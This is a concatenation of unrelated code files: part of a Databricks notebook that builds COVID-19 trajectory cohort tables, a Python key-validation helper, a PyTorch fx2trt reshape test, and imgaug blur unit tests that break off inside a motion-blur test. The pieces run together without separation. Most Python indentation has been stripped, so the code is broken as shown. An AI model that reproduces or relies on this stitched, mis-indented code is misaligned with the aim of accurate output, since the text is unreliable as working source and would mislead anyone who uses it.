# MAGIC WHERE death_date > "2020-03-20" OR death_date is null ) as b
# MAGIC ON a.person_id_deid == b.person_id_deid
# MAGIC WHERE date <= date_add(TO_DATE("2020-05-29"),28))
# COMMAND ----------
drop_table("ccu013_covid_trajectory_graph_data_wave1_icu")
create_table("ccu013_covid_trajectory_graph_data_wave1_icu")
# COMMAND ----------
# MAGIC %sql
# MAGIC -- OLD - = 56491308
# MAGIC -- New @ 220122 = 56945027
# MAGIC SELECT count(distinct person_id_deid) FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data_wave1_icu
# COMMAND ----------
# MAGIC %md
# MAGIC ### 3.2 Wave 2
# COMMAND ----------
# MAGIC %sql
# MAGIC CREATE OR REPLACE GLOBAL TEMP VIEW ccu013_covid_trajectory_graph_data_wave2_icu AS
# MAGIC SELECT * FROM
# MAGIC (SELECT a.person_id_deid, a.date, a.covid_severity, a.trajectory_phenotype, a.phenotype_order, a.days_passed
# MAGIC FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data_icu as a
# MAGIC INNER JOIN (SELECT j.person_id_deid FROM
# MAGIC (SELECT DISTINCT NHS_NUMBER_DEID as person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_dp_skinny_patient_23_01_2020) as j
# MAGIC LEFT ANTI JOIN (SELECT person_id_deid FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_paper_cohort WHERE date < "2020-09-30") as t
# MAGIC ON j.person_id_deid = t.person_id_deid
# MAGIC LEFT JOIN (SELECT person_id_deid, min(death_date) as death_date FROM dars_nic_391419_j3w9t_collab.ccu013_tmp_deaths group by person_id_deid) as c
# MAGIC ON j.person_id_deid = c.person_id_deid
# MAGIC WHERE death_date > "2020-09-30" OR death_date is null ) as b
# MAGIC ON a.person_id_deid == b.person_id_deid
# MAGIC WHERE date <= date_add(TO_DATE("2021-02-12"),28))
# COMMAND ----------
drop_table("ccu013_covid_trajectory_graph_data_wave2_icu")
create_table("ccu013_covid_trajectory_graph_data_wave2_icu")
# COMMAND ----------
# MAGIC %sql
# MAGIC -- OLD - 55774208
# MAGIC -- New = 56225024
# MAGIC SELECT count(distinct person_id_deid) FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory_graph_data_wave2_icu
# COMMAND ----------
# MAGIC %md
# MAGIC # 4 Reinfections (not currently used!)
# MAGIC - Identify all individuals who have had a reinfection with COVID-19
# MAGIC - __NB Not included in paper__ due to issues with non-overlap, on an individual and time basis, between SGSS and Pillar 2
# COMMAND ----------
#import pyspark.sql.functions as funcs
#from pyspark.sql.window import Window
#reinfec = spark.sql("""
#SELECT person_id_deid, date FROM dars_nic_391419_j3w9t_collab.ccu013_covid_trajectory
#WHERE covid_phenotype in ('01_Covid_positive_test')
#""")
#reinfect_threshold = 90 # SIREN study
# Find days between consecutive positive COVID tests
# Define window to partition by
#window = Window.partitionBy('person_id_deid').orderBy('date')
# Calculate difference in days per ID
#reinfec = reinfec.withColumn("days_passed", funcs.datediff(reinfec.date,
# funcs.lag(reinfec.date, 1).over(window)))
# Save to table
#reinfec.createOrReplaceGlobalTempView("ccu013_covid_reinfection_days_between_positive_tests")
#drop_table("ccu013_covid_reinfection_days_between_positive_tests")
#create_table("ccu013_covid_reinfection_days_between_positive_tests")
# Get the maximum difference in days between positive tests per individual
#w = Window.partitionBy('person_id_deid')
#reinfec_max_days = reinfec.withColumn('max_days_passed', f.max('days_passed').over(w))\
# .where(f.col('days_passed') == f.col('max_days_passed'))\
# .drop('max_days_passed')
## Find reinfected using reinfect_threshold
#reinfec_max_days = reinfec_max_days.withColumn('reinfected', f.when((f.col('days_passed') >= reinfect_threshold),1).otherwise(0))
#reinfec_max_days = reinfec_max_days.where(f.col('reinfected') == 1)
# Save to table
#reinfec_max_days.createOrReplaceGlobalTempView("ccu013_covid_reinfected_after_90_days")
#drop_table("ccu013_covid_reinfected_after_90_days")
#create_table("ccu013_covid_reinfected_after_90_days")
# COMMAND ----------
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import re
from keyword import kwlist
from ._compat import isidentifier
dict_list = [x for x in dict.__dict__]
kwset = set(kwlist + dict_list) # this is faster than iskeyword()
pat_identifier = re.compile(r"^[a-zA-Z_]\w*$")
def is_invalid_key(s):
    # type: (str) -> bool
"""
Check if a string is not a valid identifier and thus unsuitable for use as a
Pstruct key.
    Invalid keys also include Python keywords and ``dict`` attribute names.
:param s: string to check
:type s: str
:return: True if string is invalid
:rtype: bool
>>> is_invalid_key('aoeu')
False
>>> is_invalid_key('[aoeu')
True
>>> is_invalid_key('2aoeu')
True
>>> is_invalid_key('_2aoeu')
False
>>> is_invalid_key('ao.eu')
True
>>> is_invalid_key('items')
True
"""
if s in kwset:
return True
return not isidentifier(s)
class InvalidKeyName(Exception):
"""Key is not a valid identifier"""
def __init__(self, key_or_keys):
msg = (
"The following keys cannot be used as a key because either it is a "
"builtin method, or is not a valid identifier: {}".format(key_or_keys)
)
super(InvalidKeyName, self).__init__(msg)
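# Usage sketch: a caller might validate a mapping's keys up front and report
# all offenders at once via InvalidKeyName. ``_validate_keys_example`` is a
# hypothetical helper, not part of the original module's API.
def _validate_keys_example(data):
    # type: (dict) -> None
    bad_keys = [key for key in data if is_invalid_key(key)]
    if bad_keys:
        raise InvalidKeyName(bad_keys)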
# Owner(s): ["oncall: fx"]
import torch
import torch.fx.experimental.fx_acc.acc_ops as acc_ops
from torch.testing._internal.common_fx2trt import AccTestCase, InputTensorSpec
from parameterized import parameterized
from torch.testing._internal.common_utils import run_tests
class TestReshapeConverter(AccTestCase):
@parameterized.expand(
[
((1, 20),),
((1, 10, -1),),
]
)
def test_reshape(self, target_shape):
class TestModule(torch.nn.Module):
def __init__(self, target_shape):
super().__init__()
self.target_shape = target_shape
def forward(self, x):
return torch.reshape(x, self.target_shape)
inputs = [torch.randn(1, 2, 10)]
self.run_test(TestModule(target_shape), inputs, expected_ops={acc_ops.reshape})
@parameterized.expand(
[
((-1, 2),),
((1, 2, -1),),
]
)
def test_reshape_with_dynamic_shape(self, target_shape):
class TestModule(torch.nn.Module):
def __init__(self, target_shape):
super().__init__()
self.target_shape = target_shape
def forward(self, x):
return torch.reshape(x, self.target_shape)
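        # shape_ranges lists (min, opt, max) shapes for the dynamic input dims;
        # here every dimension may vary between 1 and 3 (a note following the
        # usual TensorRT optimization-profile convention).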
input_specs = [
InputTensorSpec(
shape=(-1, -1, -1),
dtype=torch.float32,
shape_ranges=[((1, 1, 1), (1, 2, 3), (3, 3, 3))],
),
]
self.run_test_with_dynamic_shape(
TestModule(target_shape), input_specs, expected_ops={acc_ops.reshape}
)
if __name__ == '__main__':
run_tests()
from __future__ import print_function, division, absolute_import
import time
import matplotlib
matplotlib.use('Agg') # fix execution of tests involving matplotlib on travis
import numpy as np
import six.moves as sm
import cv2
from scipy import ndimage
import imgaug as ia
from imgaug import augmenters as iaa
from imgaug import parameters as iap
from imgaug.testutils import keypoints_equal, reseed
from imgaug.augmenters import meta
def main():
time_start = time.time()
test_GaussianBlur()
test_AverageBlur()
test_MedianBlur()
# TODO BilateralBlur
time_end = time.time()
print("<%s> Finished without errors in %.4fs." % (__file__, time_end - time_start,))
def test_GaussianBlur():
reseed()
base_img = np.array([[0, 0, 0],
[0, 255, 0],
[0, 0, 0]], dtype=np.uint8)
base_img = base_img[:, :, np.newaxis]
images = np.array([base_img])
images_list = [base_img]
outer_pixels = ([], [])
for i in sm.xrange(base_img.shape[0]):
for j in sm.xrange(base_img.shape[1]):
if i != j:
outer_pixels[0].append(i)
outer_pixels[1].append(j)
keypoints = [ia.KeypointsOnImage([ia.Keypoint(x=0, y=0), ia.Keypoint(x=1, y=1),
ia.Keypoint(x=2, y=2)], shape=base_img.shape)]
    # no blur, shouldn't change anything
aug = iaa.GaussianBlur(sigma=0)
observed = aug.augment_images(images)
expected = images
assert np.array_equal(observed, expected)
# weak blur of center pixel
aug = iaa.GaussianBlur(sigma=0.5)
aug_det = aug.to_deterministic()
# images as numpy array
observed = aug.augment_images(images)
assert 100 < observed[0][1, 1] < 255
assert (observed[0][outer_pixels[0], outer_pixels[1]] > 0).all()
assert (observed[0][outer_pixels[0], outer_pixels[1]] < 50).all()
observed = aug_det.augment_images(images)
assert 100 < observed[0][1, 1] < 255
assert (observed[0][outer_pixels[0], outer_pixels[1]] > 0).all()
assert (observed[0][outer_pixels[0], outer_pixels[1]] < 50).all()
# images as list
observed = aug.augment_images(images_list)
assert 100 < observed[0][1, 1] < 255
assert (observed[0][outer_pixels[0], outer_pixels[1]] > 0).all()
assert (observed[0][outer_pixels[0], outer_pixels[1]] < 50).all()
observed = aug_det.augment_images(images_list)
assert 100 < observed[0][1, 1] < 255
assert (observed[0][outer_pixels[0], outer_pixels[1]] > 0).all()
assert (observed[0][outer_pixels[0], outer_pixels[1]] < 50).all()
    # keypoints shouldn't be changed
observed = aug.augment_keypoints(keypoints)
expected = keypoints
assert keypoints_equal(observed, expected)
observed = aug_det.augment_keypoints(keypoints)
expected = keypoints
assert keypoints_equal(observed, expected)
# varying blur sigmas
aug = iaa.GaussianBlur(sigma=(0, 1))
aug_det = aug.to_deterministic()
last_aug = None
last_aug_det = None
nb_changed_aug = 0
nb_changed_aug_det = 0
nb_iterations = 1000
for i in sm.xrange(nb_iterations):
observed_aug = aug.augment_images(images)
observed_aug_det = aug_det.augment_images(images)
if i == 0:
last_aug = observed_aug
last_aug_det = observed_aug_det
else:
if not np.array_equal(observed_aug, last_aug):
nb_changed_aug += 1
if not np.array_equal(observed_aug_det, last_aug_det):
nb_changed_aug_det += 1
last_aug = observed_aug
last_aug_det = observed_aug_det
assert nb_changed_aug >= int(nb_iterations * 0.8)
assert nb_changed_aug_det == 0
#############################
# test other dtypes below
# ndimage.gaussian_filter() rejects: float16
# float64 implementation in gaussian_filter() was too inaccurate
#############################
# --
# blur of various dtypes at sigma=0
# --
aug = iaa.GaussianBlur(sigma=0)
# bool
image = np.zeros((3, 3), dtype=bool)
image[1, 1] = True
image_aug = aug.augment_image(image)
assert image_aug.dtype.type == np.bool_
assert np.all(image_aug == image)
# uint, int
for dtype in [np.uint8, np.uint16, np.uint32, np.int8, np.int16, np.int32]:
_min_value, center_value, _max_value = meta.get_value_range_of_dtype(dtype)
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = int(center_value)
image_aug = aug.augment_image(image)
assert image_aug.dtype.type == dtype
assert np.all(image_aug == image)
# float
for dtype in [np.float16, np.float32, np.float64]:
_min_value, center_value, _max_value = meta.get_value_range_of_dtype(dtype)
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = center_value
image_aug = aug.augment_image(image)
assert image_aug.dtype.type == dtype
assert np.allclose(image_aug, image)
# --
# blur of various dtypes at sigma=1.0
# and using an example value of 100 for int/uint/float and True for bool
# --
aug = iaa.GaussianBlur(sigma=1.0)
# prototype kernel, generated via:
# mask = np.zeros((3, 3), dtype=np.float64)
# mask[1, 1] = 1.0
# mask = ndimage.gaussian_filter(mask, 1.0)
kernel = np.float64([
[0.08767308, 0.12075024, 0.08767308],
[0.12075024, 0.16630671, 0.12075024],
[0.08767308, 0.12075024, 0.08767308]
])
# bool
image = np.zeros((3, 3), dtype=bool)
image[1, 1] = True
image_aug = aug.augment_image(image)
expected = kernel > 0.5
assert image_aug.dtype.type == np.bool_
assert np.all(image_aug == expected)
# uint, int
for dtype in [np.uint8, np.uint16, np.uint32, np.int8, np.int16, np.int32]:
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = 100
image_aug = aug.augment_image(image)
expected = (kernel * 100).astype(dtype)
diff = np.abs(image_aug.astype(np.int64) - expected.astype(np.int64))
assert image_aug.dtype.type == dtype
assert np.max(diff) <= 2
# float
for dtype in [np.float16, np.float32, np.float64]:
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = 100.0
image_aug = aug.augment_image(image)
expected = (kernel * 100.0).astype(dtype)
diff = np.abs(image_aug.astype(np.float128) - expected.astype(np.float128))
assert image_aug.dtype.type == dtype
assert np.max(diff) < 1.0
# --
# blur of various dtypes at sigma=0.4
# and using an example value of 100 for int/uint/float and True for bool
# --
aug = iaa.GaussianBlur(sigma=0.4)
# prototype kernel, generated via:
# mask = np.zeros((3, 3), dtype=np.float64)
# mask[1, 1] = 1.0
# kernel = ndimage.gaussian_filter(mask, 0.4)
kernel = np.float64([
[0.00163144, 0.03712817, 0.00163144],
[0.03712817, 0.84496158, 0.03712817],
[0.00163144, 0.03712817, 0.00163144]
])
# bool
image = np.zeros((3, 3), dtype=bool)
image[1, 1] = True
image_aug = aug.augment_image(image)
expected = kernel > 0.5
assert image_aug.dtype.type == np.bool_
assert np.all(image_aug == expected)
# uint, int
for dtype in [np.uint8, np.uint16, np.uint32, np.int8, np.int16, np.int32]:
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = 100
image_aug = aug.augment_image(image)
expected = (kernel * 100).astype(dtype)
diff = np.abs(image_aug.astype(np.int64) - expected.astype(np.int64))
assert image_aug.dtype.type == dtype
assert np.max(diff) <= 2
# float
for dtype in [np.float16, np.float32, np.float64]:
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = 100.0
image_aug = aug.augment_image(image)
expected = (kernel * 100.0).astype(dtype)
diff = np.abs(image_aug.astype(np.float128) - expected.astype(np.float128))
assert image_aug.dtype.type == dtype
assert np.max(diff) < 1.0
# --
# blur of various dtypes at sigma=0.75
    # and values being half-way between center and maximum for each dtype (bool is skipped as it doesn't make any
# sense here)
# The goal of this test is to verify that no major loss of resolution happens for large dtypes.
# Such inaccuracies appear for float64 if used.
# --
aug = iaa.GaussianBlur(sigma=0.75)
# prototype kernel, generated via:
# mask = np.zeros((3, 3), dtype=np.float64)
# mask[1, 1] = 1.0
# kernel = ndimage.gaussian_filter(mask, 0.75)
kernel = np.float64([
[0.05469418, 0.12447951, 0.05469418],
[0.12447951, 0.28330525, 0.12447951],
[0.05469418, 0.12447951, 0.05469418]
])
# uint, int
for dtype in [np.uint8, np.uint16, np.uint32, np.int8, np.int16, np.int32]:
_min_value, center_value, max_value = meta.get_value_range_of_dtype(dtype)
value = int(center_value + 0.4 * max_value)
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = value
image_aug = aug.augment_image(image)
expected = (kernel * value).astype(dtype)
diff = np.abs(image_aug.astype(np.int64) - expected.astype(np.int64))
assert image_aug.dtype.type == dtype
# accepts difference of 4, 8, 16 (at 1, 2, 4 bytes, i.e. 8, 16, 32 bit)
assert np.max(diff) <= 2**(1 + np.dtype(dtype).itemsize)
# float
for dtype, value in zip([np.float16, np.float32, np.float64], [5000, 1000*1000, 1000*1000*1000]):
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = value
image_aug = aug.augment_image(image)
expected = (kernel * value).astype(dtype)
diff = np.abs(image_aug.astype(np.float128) - expected.astype(np.float128))
assert image_aug.dtype.type == dtype
# accepts difference of 2.0, 4.0, 8.0, 16.0 (at 1, 2, 4, 8 bytes, i.e. 8, 16, 32, 64 bit)
assert np.max(diff) < 2**(1 + np.dtype(dtype).itemsize)
# assert failure on invalid dtypes
aug = iaa.GaussianBlur(sigma=1.0)
for dt in [np.uint64, np.int64, np.float128]:
got_exception = False
try:
_ = aug.augment_image(np.zeros((1, 1), dtype=dt))
except Exception as exc:
assert "forbidden dtype" in str(exc)
got_exception = True
assert got_exception
def test_AverageBlur():
reseed()
base_img = np.zeros((11, 11, 1), dtype=np.uint8)
base_img[5, 5, 0] = 200
base_img[4, 5, 0] = 100
base_img[6, 5, 0] = 100
base_img[5, 4, 0] = 100
base_img[5, 6, 0] = 100
blur3x3 = [
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 11, 11, 11, 0, 0, 0, 0],
[0, 0, 0, 11, 44, 56, 44, 11, 0, 0, 0],
[0, 0, 0, 11, 56, 67, 56, 11, 0, 0, 0],
[0, 0, 0, 11, 44, 56, 44, 11, 0, 0, 0],
[0, 0, 0, 0, 11, 11, 11, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
]
blur3x3 = np.array(blur3x3, dtype=np.uint8)[..., np.newaxis]
blur4x4 = [
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 6, 6, 6, 6, 0, 0, 0],
[0, 0, 0, 6, 25, 31, 31, 25, 6, 0, 0],
[0, 0, 0, 6, 31, 38, 38, 31, 6, 0, 0],
[0, 0, 0, 6, 31, 38, 38, 31, 6, 0, 0],
[0, 0, 0, 6, 25, 31, 31, 25, 6, 0, 0],
[0, 0, 0, 0, 6, 6, 6, 6, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
]
blur4x4 = np.array(blur4x4, dtype=np.uint8)[..., np.newaxis]
blur5x5 = [
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 4, 4, 4, 4, 4, 0, 0, 0],
[0, 0, 4, 16, 20, 20, 20, 16, 4, 0, 0],
[0, 0, 4, 20, 24, 24, 24, 20, 4, 0, 0],
[0, 0, 4, 20, 24, 24, 24, 20, 4, 0, 0],
[0, 0, 4, 20, 24, 24, 24, 20, 4, 0, 0],
[0, 0, 4, 16, 20, 20, 20, 16, 4, 0, 0],
[0, 0, 0, 4, 4, 4, 4, 4, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
]
blur5x5 = np.array(blur5x5, dtype=np.uint8)[..., np.newaxis]
keypoints = [ia.KeypointsOnImage([ia.Keypoint(x=0, y=0), ia.Keypoint(x=1, y=1),
ia.Keypoint(x=2, y=2)], shape=base_img.shape)]
    # no blur, shouldn't change anything
aug = iaa.AverageBlur(k=0)
observed = aug.augment_image(base_img)
assert np.array_equal(observed, base_img)
# k=3
aug = iaa.AverageBlur(k=3)
observed = aug.augment_image(base_img)
assert np.array_equal(observed, blur3x3)
# k=5
aug = iaa.AverageBlur(k=5)
observed = aug.augment_image(base_img)
assert np.array_equal(observed, blur5x5)
# k as (3, 4)
aug = iaa.AverageBlur(k=(3, 4))
nb_iterations = 100
nb_seen = [0, 0]
for i in sm.xrange(nb_iterations):
observed = aug.augment_image(base_img)
if np.array_equal(observed, blur3x3):
nb_seen[0] += 1
elif np.array_equal(observed, blur4x4):
nb_seen[1] += 1
else:
raise Exception("Unexpected result in AverageBlur@1")
p_seen = [v/nb_iterations for v in nb_seen]
assert 0.4 <= p_seen[0] <= 0.6
assert 0.4 <= p_seen[1] <= 0.6
# k as (3, 5)
aug = iaa.AverageBlur(k=(3, 5))
nb_iterations = 100
nb_seen = [0, 0, 0]
for i in sm.xrange(nb_iterations):
observed = aug.augment_image(base_img)
if np.array_equal(observed, blur3x3):
nb_seen[0] += 1
elif np.array_equal(observed, blur4x4):
nb_seen[1] += 1
elif np.array_equal(observed, blur5x5):
nb_seen[2] += 1
else:
raise Exception("Unexpected result in AverageBlur@2")
p_seen = [v/nb_iterations for v in nb_seen]
assert 0.23 <= p_seen[0] <= 0.43
assert 0.23 <= p_seen[1] <= 0.43
assert 0.23 <= p_seen[2] <= 0.43
# k as stochastic parameter
aug = iaa.AverageBlur(k=iap.Choice([3, 5]))
nb_iterations = 100
nb_seen = [0, 0]
for i in sm.xrange(nb_iterations):
observed = aug.augment_image(base_img)
if np.array_equal(observed, blur3x3):
nb_seen[0] += 1
elif np.array_equal(observed, blur5x5):
nb_seen[1] += 1
else:
raise Exception("Unexpected result in AverageBlur@3")
p_seen = [v/nb_iterations for v in nb_seen]
assert 0.4 <= p_seen[0] <= 0.6
assert 0.4 <= p_seen[1] <= 0.6
# k as ((3, 5), (3, 5))
aug = iaa.AverageBlur(k=((3, 5), (3, 5)))
possible = dict()
for kh in [3, 4, 5]:
for kw in [3, 4, 5]:
key = (kh, kw)
if kh == 0 or kw == 0:
possible[key] = np.copy(base_img)
else:
possible[key] = cv2.blur(base_img, (kh, kw))[..., np.newaxis]
nb_iterations = 250
nb_seen = dict([(key, 0) for key, val in possible.items()])
for i in sm.xrange(nb_iterations):
observed = aug.augment_image(base_img)
for key, img_aug in possible.items():
if np.array_equal(observed, img_aug):
nb_seen[key] += 1
    # don't check sum here, because 0xX and Xx0 are all the same, i.e. much
# higher sum than nb_iterations
assert all([v > 0 for v in nb_seen.values()])
    # keypoints shouldn't be changed
aug = iaa.AverageBlur(k=3)
aug_det = aug.to_deterministic()
observed = aug.augment_keypoints(keypoints)
expected = keypoints
assert keypoints_equal(observed, expected)
observed = aug_det.augment_keypoints(keypoints)
expected = keypoints
assert keypoints_equal(observed, expected)
#############################
# test other dtypes below
#############################
# --
# blur of various dtypes at k=0
# --
aug = iaa.AverageBlur(k=0)
# bool
image = np.zeros((3, 3), dtype=bool)
image[1, 1] = True
image[2, 2] = True
image_aug = aug.augment_image(image)
assert image_aug.dtype.type == np.bool_
assert np.all(image_aug == image)
# uint, int
for dtype in [np.uint8, np.uint16, np.int8, np.int16]:
_min_value, center_value, max_value = meta.get_value_range_of_dtype(dtype)
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = int(center_value + 0.4 * max_value)
image[2, 2] = int(center_value + 0.4 * max_value)
image_aug = aug.augment_image(image)
assert image_aug.dtype.type == dtype
assert np.all(image_aug == image)
# float
for dtype, value in zip([np.float16, np.float32, np.float64], [5000, 1000*1000, 1000*1000*1000]):
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = value
image[2, 2] = value
image_aug = aug.augment_image(image)
assert image_aug.dtype.type == dtype
assert np.allclose(image_aug, image)
# --
# blur of various dtypes at k=3
# and using an example value of 100 for int/uint/float and True for bool
# --
aug = iaa.AverageBlur(k=3)
# prototype mask
# we place values in a 3x3 grid at positions (row=1, col=1) and (row=2, col=2) (beginning with 0)
# AverageBlur uses cv2.blur(), which uses BORDER_REFLECT_101 as its default padding mode,
# see https://docs.opencv.org/3.1.0/d2/de8/group__core__array.html
# the matrix below shows the 3x3 grid and the padded row/col values around it
# [1, 0, 1, 0, 1]
# [0, 0, 0, 0, 0]
# [1, 0, 1, 0, 1]
# [0, 0, 0, 1, 0]
# [1, 0, 1, 0, 1]
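    # e.g. the top-left 3x3 window of the padded grid above covers four 1s out
    # of nine cells, giving mask[0, 0] = 4/9; the centre window covers two 1s,
    # giving mask[1, 1] = 2/9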
mask = np.float64([
[4/9, 2/9, 4/9],
[2/9, 2/9, 3/9],
[4/9, 3/9, 5/9]
])
# bool
image = np.zeros((3, 3), dtype=bool)
image[1, 1] = True
image[2, 2] = True
image_aug = aug.augment_image(image)
expected = mask > 0.5
assert image_aug.dtype.type == np.bool_
assert np.all(image_aug == expected)
# uint, int
for dtype in [np.uint8, np.uint16, np.int8, np.int16]:
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = 100
image[2, 2] = 100
image_aug = aug.augment_image(image)
expected = np.round(mask * 100).astype(dtype) # cv2.blur() applies rounding for int/uint dtypes
diff = np.abs(image_aug.astype(np.int64) - expected.astype(np.int64))
assert image_aug.dtype.type == dtype
assert np.max(diff) <= 2
# float
for dtype in [np.float16, np.float32, np.float64]:
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = 100.0
image[2, 2] = 100.0
image_aug = aug.augment_image(image)
expected = (mask * 100.0).astype(dtype)
diff = np.abs(image_aug.astype(np.float128) - expected.astype(np.float128))
assert image_aug.dtype.type == dtype
assert np.max(diff) < 1.0
# --
# blur of various dtypes at k=3
    # and values being half-way between center and maximum for each dtype (bool is skipped as it doesn't make any
# sense here)
# The goal of this test is to verify that no major loss of resolution happens for large dtypes.
# --
aug = iaa.AverageBlur(k=3)
# prototype mask (see above)
mask = np.float64([
[4/9, 2/9, 4/9],
[2/9, 2/9, 3/9],
[4/9, 3/9, 5/9]
])
# uint, int
for dtype in [np.uint8, np.uint16, np.int8, np.int16]:
_min_value, center_value, max_value = meta.get_value_range_of_dtype(dtype)
value = int(center_value + 0.4 * max_value)
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = value
image[2, 2] = value
image_aug = aug.augment_image(image)
expected = (mask * value).astype(dtype)
diff = np.abs(image_aug.astype(np.int64) - expected.astype(np.int64))
assert image_aug.dtype.type == dtype
# accepts difference of 4, 8, 16 (at 1, 2, 4 bytes, i.e. 8, 16, 32 bit)
assert np.max(diff) <= 2**(1 + np.dtype(dtype).itemsize)
# float
for dtype, value in zip([np.float16, np.float32, np.float64], [5000, 1000*1000, 1000*1000*1000]):
image = np.zeros((3, 3), dtype=dtype)
image[1, 1] = value
image[2, 2] = value
image_aug = aug.augment_image(image)
expected = (mask * value).astype(dtype)
diff = np.abs(image_aug.astype(np.float128) - expected.astype(np.float128))
assert image_aug.dtype.type == dtype
# accepts difference of 2.0, 4.0, 8.0, 16.0 (at 1, 2, 4, 8 bytes, i.e. 8, 16, 32, 64 bit)
assert np.max(diff) < 2**(1 + np.dtype(dtype).itemsize)
# assert failure on invalid dtypes
aug = iaa.AverageBlur(k=3)
for dt in [np.uint32, np.uint64, np.int32, np.int64]:
got_exception = False
try:
_ = aug.augment_image(np.zeros((1, 1), dtype=dt))
except Exception as exc:
assert "forbidden dtype" in str(exc)
got_exception = True
assert got_exception
def test_MedianBlur():
reseed()
base_img = np.zeros((11, 11, 1), dtype=np.uint8)
base_img[3:8, 3:8, 0] = 1
base_img[4:7, 4:7, 0] = 2
base_img[5:6, 5:6, 0] = 3
blur3x3 = np.zeros_like(base_img)
blur3x3[3:8, 3:8, 0] = 1
blur3x3[4:7, 4:7, 0] = 2
blur3x3[4, 4, 0] = 1
blur3x3[4, 6, 0] = 1
blur3x3[6, 4, 0] = 1
blur3x3[6, 6, 0] = 1
blur3x3[3, 3, 0] = 0
blur3x3[3, 7, 0] = 0
blur3x3[7, 3, 0] = 0
blur3x3[7, 7, 0] = 0
blur5x5 = np.copy(blur3x3)
blur5x5[4, 3, 0] = 0
blur5x5[3, 4, 0] = 0
blur5x5[6, 3, 0] = 0
blur5x5[7, 4, 0] = 0
blur5x5[4, 7, 0] = 0
blur5x5[3, 6, 0] = 0
blur5x5[6, 7, 0] = 0
blur5x5[7, 6, 0] = 0
blur5x5[blur5x5 > 1] = 1
keypoints = [ia.KeypointsOnImage([ia.Keypoint(x=0, y=0), ia.Keypoint(x=1, y=1),
ia.Keypoint(x=2, y=2)], shape=base_img.shape)]
    # no blur, shouldn't change anything
aug = iaa.MedianBlur(k=1)
observed = aug.augment_image(base_img)
assert np.array_equal(observed, base_img)
# k=3
aug = iaa.MedianBlur(k=3)
observed = aug.augment_image(base_img)
assert np.array_equal(observed, blur3x3)
# k=5
aug = iaa.MedianBlur(k=5)
observed = aug.augment_image(base_img)
assert np.array_equal(observed, blur5x5)
# k as (3, 5)
aug = iaa.MedianBlur(k=(3, 5))
seen = [False, False]
for i in sm.xrange(100):
observed = aug.augment_image(base_img)
if np.array_equal(observed, blur3x3):
seen[0] = True
elif np.array_equal(observed, blur5x5):
seen[1] = True
else:
raise Exception("Unexpected result in MedianBlur@1")
if all(seen):
break
assert all(seen)
# k as stochastic parameter
aug = iaa.MedianBlur(k=iap.Choice([3, 5]))
seen = [False, False]
for i in sm.xrange(100):
observed = aug.augment_image(base_img)
if np.array_equal(observed, blur3x3):
            seen[0] = True
        elif np.array_equal(observed, blur5x5):
            seen[1] = True
else:
raise Exception("Unexpected result in MedianBlur@2")
if all(seen):
break
assert all(seen)
    # keypoints shouldn't be changed
aug = iaa.MedianBlur(k=3)
aug_det = aug.to_deterministic()
observed = aug.augment_keypoints(keypoints)
expected = keypoints
assert keypoints_equal(observed, expected)
observed = aug_det.augment_keypoints(keypoints)
expected = keypoints
assert keypoints_equal(observed, expected)
def test_MotionBlur():
reseed()
# simple scenario
aug = iaa.MotionBlur(k=3, angle=0, direction=0.0)
matrix_func = aug.matrix
matrices = [matrix_func(np.zeros((128, 128, 3), dtype=np.uint8), 3, ia.new_random_state(i)) for i in range(10)]
expected = np.float32([
[0, 1.0/3, 0],
[0, 1.0/3, 0],
[0, 1.0/3, 0]
])
for matrices_image in matrices:
for matrix_channel in matrices_image:
assert np.allclose(matrix_channel, expected)
# 90deg angle
aug = iaa.MotionBlur(k=3, angle=90, direction=0.0)
matrix_func = aug.matrix
matrices = [matrix_func(np.zeros((128, 128, 3), dtype=np.uint8), 3, ia.new_random_state(i)) for i in range(10)]
expected = np.float32([
[0, 0, 0],
[1.0/3, 1.0/3, 1.0/3],
[0, 0, 0]
])
for matrices_image in matrices:
for matrix_channel in matrices_image:
assert np.allclose(matrix_channel, expected)
# 45deg angle
aug = iaa.MotionBlur(k=3, angle=45, direction=0.0, order=0)
matrix_func = aug.matrix
matrices = [matrix_func(np.zeros((128, 128, 3), dtype=np.uint8), 3, ia.new_random_state(i)) for i in range(10)]
expected = np.float32([
[0, 0, 1.0/3],
[0, 1.0/3, 0],
[1.0/3, 0, 0]
])
for matrices_image in matrices:
for matrix_channel in matrices_image:
assert np.allclose(matrix_channel, expected)
# random angle
aug = iaa.MotionBlur(k=3, angle=[0, 90], direction=0.0)
matrix_func = aug.matrix
